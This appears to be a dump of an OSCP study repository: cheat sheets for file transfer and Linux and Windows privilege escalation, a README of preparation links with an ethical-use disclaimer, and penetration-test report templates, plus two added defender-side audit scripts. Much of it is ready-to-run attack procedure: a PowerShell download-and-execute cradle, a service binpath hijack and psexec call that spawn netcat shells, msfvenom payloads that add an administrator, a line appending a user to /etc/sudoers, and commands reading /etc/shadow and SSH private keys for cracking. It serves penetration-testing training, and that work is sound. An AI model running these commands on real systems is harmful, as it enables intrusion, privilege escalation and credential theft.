chown -R ftpuser:ftpgroup /root/ftphome
# restart Pure-FTPd
/etc/init.d/pure-ftpd restart


# On Windows
echo open 21 > ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

--------------------------------------

Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http:///powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

--------------------------------------
# Powershell download a file
powershell "IEX(New-Object Net.WebClient).downloadString('http:///file.ps1')"


--------------------------------------------------------------------------------
/Priv Esc - Linux:
--------------------------------------------------------------------------------

# priv esc enumeration scripts
https://github.com/rebootuser/LinEnum
https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py
http://pentestmonkey.net/tools/audit/unix-privesc-check

# Kernel and OS
uname -a
uname -mrs
cat /etc/issue
cat /etc/lsb-release      # Debian based
cat /etc/redhat-release   # Redhat based

# running services, and find services run by root
ps aux
ps aux | grep root

# which applications are installed
dpkg -l
ls -alh /usr/bin/
ls -alh /sbin/

# scheduled tasks
crontab -l

# port forwarding
ssh -L 8080:127.0.0.1:80 root@192.168.1.7   # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7   # Remote Port

# tunneling
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

# sensitive files
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

# check home dirs
ls -ahlR /root/
ls -ahlR /home

# private key search
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


# Sticky Bits & SUID & SGID

find / -perm -1000 -type d 2>/dev/null   # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null   # SGID or SUID


--------------------------------------------------------------------------------
/Priv Esc - Windows:
--------------------------------------------------------------------------------
Windows

Enumeration

# basics
systeminfo
hostname
echo %username%

# users
net users
net user

# network
ipconfig /all
route print
arp -A
netstat -ano   # active network connections

# firewall status
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all

# save the systeminfo output in a file and check it for vulnerabilities
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt

# Search the installed patches for given KBs
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
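As an added defender-side example, not from these notes, the Python script below does what the `wmic service get ... | findstr` pipeline in the Unquoted Path section further down does by hand: it parses the output of `wmic service get name,displayname,pathname,startmode /format:list`, flags every service whose unquoted image path contains spaces outside C:\Windows, lists the directories whose ACLs have to be verified with icacls, and prints the quoted PathName to set back with `sc config <name> binPath=`. The wmic output embedded in it is constructed and the service names in it are made up.

```python
"""Defender-side check for unquoted Windows service paths (added example).

Consumes `wmic service get name,displayname,pathname,startmode /format:list`
output (one Key=Value block per service) and reports services whose image
path is unquoted and contains spaces, the directories whose ACLs must be
verified with icacls, and the corrected, quoted PathName.
"""
import ntpath
import re

# Constructed sample of `wmic ... /format:list` output; not from a real host.
SAMPLE_WMIC_LIST = """
DisplayName=Windows Update
Name=wuauserv
PathName=C:\\Windows\\system32\\svchost.exe -k netsvcs
StartMode=Auto

DisplayName=Vendor Agent
Name=VendorAgent
PathName=C:\\Program Files (x86)\\Program Folder\\A Subfolder\\Executable.exe
StartMode=Auto

DisplayName=Quoted Agent
Name=QuotedAgent
PathName="C:\\Program Files\\Quoted Agent\\agent.exe" -service
StartMode=Auto

DisplayName=Manual Tool
Name=ManualTool
PathName=C:\\Tools\\My Tool\\tool.exe /arg
StartMode=Manual
"""

# Image paths under the system directory are trusted, as in the wmic|findstr one-liner.
SYSTEM_PREFIXES = ("c:\\windows\\", "%systemroot%\\")


def parse_wmic_list(text):
    """Split /format:list output into one dict per service (blank line = separator)."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def split_image_path(pathname):
    """Return (executable_path, is_quoted) for a service PathName value.

    For an unquoted path the executable ends at the first '.exe' followed by
    whitespace or end of string; whatever follows is treated as arguments.
    """
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return (pathname[1:end] if end != -1 else pathname[1:]), True
    match = re.search(r"\.exe(?=\s|$)", pathname, re.IGNORECASE)
    exe = pathname[:match.end()] if match else pathname
    return exe, False


def directories_to_audit(exe):
    """Directories from which a wrong binary could be picked up.

    For every space in an unquoted path Windows first tries the prefix before
    that space, so the directory holding each prefix must not be writable by
    unprivileged users (check with: icacls "<dir>").
    """
    dirs = []
    for index, char in enumerate(exe):
        if char == " ":
            directory = ntpath.dirname(exe[:index])
            if directory not in dirs:
                dirs.append(directory)
    return dirs


def find_unquoted_services(records):
    """Return findings for services whose unquoted image path contains spaces."""
    findings = []
    for record in records:
        pathname = record.get("PathName", "").strip()
        exe, quoted = split_image_path(pathname)
        if quoted or " " not in exe or exe.lower().startswith(SYSTEM_PREFIXES):
            continue
        findings.append({
            "name": record.get("Name", "?"),
            "start_mode": record.get("StartMode", "?"),
            "exe": exe,
            "audit_dirs": directories_to_audit(exe),
            # Value to set back with: sc config <name> binPath= "<fixed_pathname>"
            "fixed_pathname": '"%s"%s' % (exe, pathname[len(exe):]),
        })
    return findings


def main():
    for finding in find_unquoted_services(parse_wmic_list(SAMPLE_WMIC_LIST)):
        print("[!] %(name)s (%(start_mode)s start): %(exe)s" % finding)
        for directory in finding["audit_dirs"]:
            print('    icacls "%s"' % directory)
        print("    fix: %s" % finding["fixed_pathname"])


if __name__ == "__main__":
    main()
```

Unlike the one-liner it does not filter on Auto start: a Manual service started by an operator or a scheduled task is just as affected, so the start mode is reported instead of used as a filter.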

--------------------------------------
Kernel
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

# check for possible exploits, find a place to upload it (e.g. C:\Inetpub or C:\temp), run the exe

--------------------------------------
Weak permissions
# this example is for XP SP0
# upload accesschk.exe to a writable directory first
# for XP, version 5.2 of accesschk.exe is needed
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

# check for services with weak permissions
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# check the services found above
accesschk.exe -ucqv upnphost
# upload nc.exe to a writable directory
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
# check the status now
sc qc upnphost
# change the start option to AUTO-START
sc config SSDPSRV start= auto
# start the services
net start SSDPSRV
net stop upnphost
net start upnphost

# listen on port 9988 and you'll get a shell with NT AUTHORITY\SYSTEM privileges

--------------------------------------

Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

--------------------------------------
Places to Check for Credentials

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini

----------------------------
Groups.xml
# Look up the IP address of the DC
nslookup nameofserver.whatever.local

# It will output something like this
Address: 192.168.1.101

# Now we mount it
net use z: \\192.168.1.101\SYSVOL

# And enter it
z:

# Now we search for the groups.xml file
dir Groups.xml /s

# decrypt the password in it
gpp-decrypt

-----------------------------

AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# From the output, notice that the "AlwaysInstallElevated" value is 1.

# Exploitation:
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
Place 'setup.msi' in 'C:\Temp'
msiexec /quiet /qn /i C:\Temp\setup.msi
net localgroup Administrators

---------------------------------
Find writable files


dir /a-r-d /s /b
/a filters by attribute; -r excludes read-only files and -d excludes directories (so only writable files are listed)
/s means recurse subdirectories
/b means bare format: path and filename only

-----------------------------------
Unquoted Path
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
# check the permissions of the folders in the path
icacls "C:\Program Files (x86)\Program Folder"

# exploit
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
Place common.exe in 'C:\Program Files\Unquoted Path Service'.
# Open a command prompt and type:
sc start unquotedsrvc
net localgroup Administrators

-----------------------------------
# psexec using found credentials
# first upload nc.exe to a writable directory
psexec.exe -u -p \\MACHINENAME C:\Inetpub\nc.exe -e C:\windows\system32\cmd.exe

--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
# OSCP Cave of Wonders


![Cave of Wonders](http://oyster.ignimgs.com/wordpress/stg.ign.com/2018/10/082.jpg)


On my personal path to OSCP I have gathered quite a bit of important and useful information. The goal is to organize it in this Cave of Wonders to help fellow and future students of this amazing skill.



----------

Legal Notice && Usage:
*The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an "*[*ethical hacker*](https://www.dictionary.com/browse/ethical-hacker)*" standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use the information at your own risk.*

*By continuing, you acknowledge the aforementioned user risk/responsibilities.*


----------



**Path to OSCP Write-ups**

https://h0mbre.github.io/OSCP/# (resources available on the site)

https://www.reddit.com/r/hacking/comments/7nkmfc/road_to_oscp/

https://h4cklife.org/2018/05/22/a-pre-exam-for-future-oscp-students/

https://areyou1or0.blogspot.com/2019/01/finally-oscp-may-force-be-with-you.html

https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp

https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html

https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440

https://www.cybrary.it/0p3n/prep-guide-offsecs-pwkoscp/

(added) https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html

https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/


**OSCP Like Boxes:**


![](https://d2mxuefqeaa7sj.cloudfront.net/s_351A7D4F2DBCAF6EB8FB891FE142C0B41CFA7F706C7700B8A3D9E20EA5B637D7_1550514432475_image.png)


source: https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms


![](https://d2mxuefqeaa7sj.cloudfront.net/s_351A7D4F2DBCAF6EB8FB891FE142C0B41CFA7F706C7700B8A3D9E20EA5B637D7_1550513570829_image.png)


source: https://twitter.com/TJ_Null/status/1088954719152865281?s=19



![](https://d2mxuefqeaa7sj.cloudfront.net/s_351A7D4F2DBCAF6EB8FB891FE142C0B41CFA7F706C7700B8A3D9E20EA5B637D7_1550514309701_image.png)


source: can't remember



https://www.youtube.com/playlist?list=PLK5YOQDpZKK2GtfxOHw9LQZl3z_f74EoR



**OSCP Preparation Notes**


![](https://d2mxuefqeaa7sj.cloudfront.net/s_351A7D4F2DBCAF6EB8FB891FE142C0B41CFA7F706C7700B8A3D9E20EA5B637D7_1550514597005_image.png)


source: https://highon.coffee/blog/cheat-sheet/


https://github.com/rewardone/OSCPRepo

https://github.com/areyou1or0/OSCP


--------------------------------------------------------------------------------
/Reporting-Templates/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/executeatwill/OSCP-Treasure-Cave/c3e706a3527d1887b4f8462932e4372bab06d418/Reporting-Templates/.DS_Store
--------------------------------------------------------------------------------
/Reporting-Templates/linux-template.md:
--------------------------------------------------------------------------------
## Info-sheet

- DNS-Domain name:
- Host name:
- OS:
- Server:
- Kernel:
- Workgroup:
- Windows domain:

Services and ports:
INSERTTCPSCAN

## Recon


```
Always start with a stealthy scan to avoid closing ports.

# Syn-scan
nmap -sS INSERTIPADDRESS

# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-

# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333

# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS

# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772

# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC
```


### Port 21 - FTP

- FTP-Name:
- FTP-version:
- Anonymous login:

INSERTFTPTEST


```
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
```

### Port 22 - SSH

- Name:
- Version:
- Takes-password:
- If you have usernames test login with username:username

INSERTSSHCONNECT

```
nc INSERTIPADDRESS 22
```

### Port 25

- Name:
- Version:
- VRFY:

INSERTSMTPCONNECT


```
nc -nvv INSERTIPADDRESS 25
HELO foo

telnet INSERTIPADDRESS 25
VRFY root

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
```

### Port 69 - UDP - TFTP

This is used for tftp-server.


### Port 110 - Pop3

- Name:
- Version:

INSERTPOP3CONNECT

```
telnet INSERTIPADDRESS 110
USER pelle@INSERTIPADDRESS
PASS admin

or:

USER pelle
PASS admin

# List all emails
list

# Retrieve email number 9, for example
retr 9
```

### Port 111 - Rpcbind

```
rpcinfo -p INSERTIPADDRESS
```


### Port 135 - MSRPC

Some versions are vulnerable.

### Port 143 - Imap

### Port 139/445 - SMB

- Name:
- Version:
- Domain/workgroup name:
- Domain-sid:
- Allows unauthenticated login:


```
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445


enum4linux -a INSERTIPADDRESS
rpcclient -U "" INSERTIPADDRESS
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
```


### Port 161/162 UDP - SNMP

```
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
snmp-check -t INSERTIPADDRESS -c public
```

```
# Common community strings
public
private
community
```


### Port 554 - RTSP


### Port 1030/1032/1033/1038

Used by RPC to connect in domain network.

### Port 1521 - Oracle

- Name:
- Version:
- Password protected:

```
tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS
```

### Port 2049 - NFS

```
showmount -e INSERTIPADDRESS

If you find anything you can mount it like this:

mount INSERTIPADDRESS:/ /tmp/NFS
mount -t nfs INSERTIPADDRESS:/ /tmp/NFS
```

### Port 2100 - Oracle XML DB

- Name:
- Version:
- Default logins:

```
sys:sys
scott:tiger
```

Default passwords
https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm


### Port 3306 - MySQL

- Name:
- Version:

```
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306

mysql --host=INSERTIPADDRESS -u root -p
```

### Port 3339 - Oracle web interface


- Basic info about web service (apache, nginx, IIS)
- Server:
- Scripting language:
- Apache Modules:
- IP-address:

### Port 80 - Web server

- Server:
- Scripting language:
- Apache Modules:
- IP-address:
- Domain-name address:


INSERTCURLHEADER

- Web application (e.g. wordpress, joomla, phpmyadmin)
- Name:
- Version:
- Admin-login:


```
# Nikto
nikto -h http://INSERTIPADDRESS

# Nikto with squid proxy
nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444

# CMS Explorer
cms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo]

# WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)
wpscan --url http://INSERTIPADDRESS
wpscan --url http://INSERTIPADDRESS --enumerate vp
wpscan --url http://INSERTIPADDRESS --enumerate vt
wpscan --url http://INSERTIPADDRESS --enumerate u

# Joomscan
joomscan -u http://INSERTIPADDRESS
joomscan -u http://INSERTIPADDRESS --enumerate-components

# Get header
curl -i INSERTIPADDRESS

# Get everything
curl -i -L INSERTIPADDRESS

# Check for title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Look at page with just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq

# Check if it is possible to upload
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php

dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
```

#### Nikto scan


INSERTNIKTOSCAN


#### Url brute force

```
# Not recursive
dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt

# Gobuster - remove relevant response codes (403 for example)
gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```

INSERTDIRBSCAN


#### Default/Weak login

Search documentation for default passwords and test them

```
site:webapplication.com password
```

```
admin admin
admin password
admin
admin
root root
root admin
root password
root
password
admin
username
username
```


#### LFI/RFI


```
fimap -u "http://INSERTIPADDRESS/example.php?test="

# Ordered output
curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd
/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=
```

#### SQL-Injection

```
# Post
./sqlmap.py -r search-test.txt -p tfUPass

# Get
sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql

# Crawl
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
```

#### Sql-login-bypass

- Open Burp-suite
- Make and intercept a request
- Send to intruder
- Cluster attack.
- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
- Attack
- Check for response length variation


### Password brute force - last resort

```
cewl
```

### Port 443 - HTTPS

Heartbleed:

```
# Heartbleed
sslscan INSERTIPADDRESS:443
```

## Vulnerability analysis

Now we have gathered information about the system. Now comes the part where we look for exploits, vulnerabilities and features.

### To try - List of possibilities
Add possible exploits here:



### Find sploits - Searchsploit and google

Where there are many exploits for a software, use google. It will automatically sort it by popularity.

```
site:exploit-db.com apache 2.4.7

# Remove dos-exploits

searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"

# Only search the title (exclude the path), add the -t
searchsploit -t Apache | grep -v '/dos/'
```



----------------------------------------------------------------------------



'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''



-----------------------------------------------------------------------------



## Privilege escalation

Now we start the whole enumeration process over again.

- Kernel exploits
- Programs running as root
- Installed software
- Weak/reused/plaintext passwords
- Inside service
- Suid misconfiguration
- World writable scripts invoked by root
- Unmounted filesystems

Less likely

- Private ssh keys
- Bad path configuration
- Cronjobs


### To-try list

Here you will add all possible leads. What to try.
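The `find` commands in the Sticky Bits & SUID & SGID section of Priv Esc - Linux and the Suid misconfiguration check further down this template look for the same three permission bits. As an added defender-side example that is not part of this template, the Python script below implements those three tests with stat bits, walks a tree without following symlinks, and diffs the result against a previously saved baseline so that a newly introduced SUID binary stands out; the sandbox it builds under a temporary directory is constructed for the demo.

```python
"""Audit a tree for sticky, SUID and SGID bits and diff it against a baseline.

Added example, not part of the original template. Applies the same three
tests as the find(1) one-liners (sticky: directories only; SUID/SGID:
regular files only), never follows symlinks, and reports entries whose
bits differ from a saved baseline.
"""
import os
import shutil
import stat
import tempfile


def classify(mode):
    """Labels for one st_mode value, mirroring the three find checks."""
    labels = []
    if stat.S_ISREG(mode):
        if mode & stat.S_ISUID:
            labels.append("suid")      # runs as the file owner
        if mode & stat.S_ISGID:
            labels.append("sgid")      # runs as the file group
    elif stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
        labels.append("sticky")        # only owners may delete/rename entries
    return labels


def scan_tree(root):
    """Map relative path -> labels for every flagged entry below root."""
    found = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)    # lstat: a symlink itself never counts as SUID
            except OSError:
                continue
            labels = classify(st.st_mode)
            if labels:
                found[os.path.relpath(path, root)] = labels
    return found


def new_or_changed(current, baseline):
    """Entries present now whose bits the baseline did not record."""
    return {path: labels for path, labels in current.items()
            if baseline.get(path) != labels}


def demo():
    """Constructed sandbox: one SUID file, one sticky dir, one plain file."""
    root = tempfile.mkdtemp(prefix="specialbits-")
    try:
        os.makedirs(os.path.join(root, "bin"))
        helper = os.path.join(root, "bin", "helper")
        with open(helper, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(helper, 0o4755)                  # SUID binary
        shared = os.path.join(root, "shared")
        os.makedirs(shared)
        os.chmod(shared, 0o1777)                  # sticky world-writable dir, like /tmp
        with open(os.path.join(root, "notes.txt"), "w") as fh:
            fh.write("plain\n")
        return scan_tree(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    current = demo()
    baseline = {"shared": ["sticky"]}             # pretend this was saved earlier
    for path, labels in sorted(new_or_changed(current, baseline).items()):
        print("[!] new special bits: %s (%s)" % (path, ",".join(labels)))
```

Run it against `/` as root, store the dictionary from a known-good build as the baseline, and re-run after changes: anything `new_or_changed` returns is either an expected package update or something to investigate.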


### Useful commands

```
# Spawning shell
python -c 'import pty; pty.spawn("/bin/sh")'

# Access to more binaries
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Set up webserver
cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080

# Download all files
wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check

./LinEnum.sh -t -k password -r LinEnum.txt
python linprivchecker.py extended
./unix-privesc-check standard


# Writable directories
/tmp
/var/tmp


# Add user to sudoers
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
```


### Basic info

- OS:
- Version:
- Kernel version:
- Architecture:
- Current user:

**Devtools:**
- GCC:
- NC:
- WGET:

**Users with login:**

```
uname -a
env
id
cat /proc/version
cat /etc/issue
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts

# Users with login
grep -vE "nologin" /etc/passwd

# Priv Enumeration Scripts


upload /unix-privesc-check
upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./
upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./

python linprivchecker.py extended
./LinEnum.sh -t -k password
unix-privesc-check
```

### Kernel exploits

```
site:exploit-db.com kernel version

perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6

python linprivchecker.py extended
```

### Programs running as root

Look for webserver, mysql or anything else like that.

```
# Metasploit
ps

# Linux
ps aux
```

### Installed software

```
/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/

# Debian
dpkg -l

# CentOS, OpenSuse, Fedora, RHEL
rpm -qa (CentOS / openSUSE )

# OpenBSD, FreeBSD
pkg_info
```


### Weak/reused/plaintext passwords

- Check database config-file
- Check databases
- Check weak passwords

```
username:username
username:username1
username:root
username:admin
username:qwerty
username:password
```

- Check plaintext

```
./LinEnum.sh -t -k password
```

### Inside service

```
# Linux
netstat -anlp
netstat -ano
```

### Suid misconfiguration

A binary with the SUID bit can be run by anyone, but it runs with the privileges of its owner (root, in the interesting cases).

Example programs:

```
nmap
vim
nano
```

```
find / -perm -u=s -type f 2>/dev/null
```


### Unmounted filesystems

Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.

```
mount -l
```

### Cronjob

Look for anything that is owned by a privileged user but writable for you

```
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
```

### SSH Keys

Check all home directories

```
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
```


### Bad path configuration

Requires user interaction




------------------------------------------------------------------------




----------------------------- LOOT LOOT LOOT LOOT ----------------------




------------------------------------------------------------------------


## Loot

**Checklist**

- Proof:
- Network secret:
- Passwords and hashes:
- Dualhomed:
- Tcpdump:
- Interesting files:
- Databases:
- SSH-keys:
- Browser:
- Mail:


### Proof

```
/root/proof.txt
```

### Network secret

```
/root/network-secret.txt
```

### Passwords and hashes

```
cat /etc/passwd
cat /etc/shadow

unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
```

### Dualhomed

```
ifconfig
ifconfig -a
arp -a
```

### Tcpdump

```
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
```

### Interesting files

```
# Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql

.ssh:
.bash_history
```

### Databases

### SSH-Keys

### Browser

### Mail

```
/var/mail
/var/spool/mail
```

### GUI
If there is a GUI we want to check out the browser.

```
echo $DESKTOP_SESSION
echo $XDG_CURRENT_DESKTOP
echo $GDMSESSION
```

## How to replicate:
--------------------------------------------------------------------------------
/Reporting-Templates/windows-template.md:
--------------------------------------------------------------------------------
## Info-sheet


- DNS-Domain name:
- Host name:
- OS:
- Server:
- Workgroup:
- Windows domain:
- Services and ports:

INSERTTCPSCAN


## Recon

```
Always start with a stealthy scan to avoid closing ports.

# Syn-scan
nmap -sS INSERTIPADDRESS

# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O

# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-

# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS

# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772

# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC
```


### Port 21 - FTP

- Name:
- Version:
- Anonymous login:

INSERTFTPTEST

```
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
```

### Port 22 - SSH

- Name:
- Version:
- Protocol:
- RSA-key-fingerprint:
- Takes-password:
If you have usernames test login with username:username

INSERTSSHCONNECT


### Port 25

- Name:
- Version:
- VRFY:
- EXPN:

INSERTSMTPCONNECT

```
nc -nvv INSERTIPADDRESS 25
HELO foo

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
```

### Port 110 - Pop3

- Name:
- Version:

INSERTPOP3CONNECT

### Port 135 - MSRPC

Some versions are vulnerable.

```
nmap INSERTIPADDRESS --script=msrpc-enum
```

Exploit:

```
msf > use exploit/windows/dcerpc/ms03_026_dcom
```

### Port 139/445 - SMB

- Name:
- Version:
- Domain/workgroup name:
- Domain-sid:
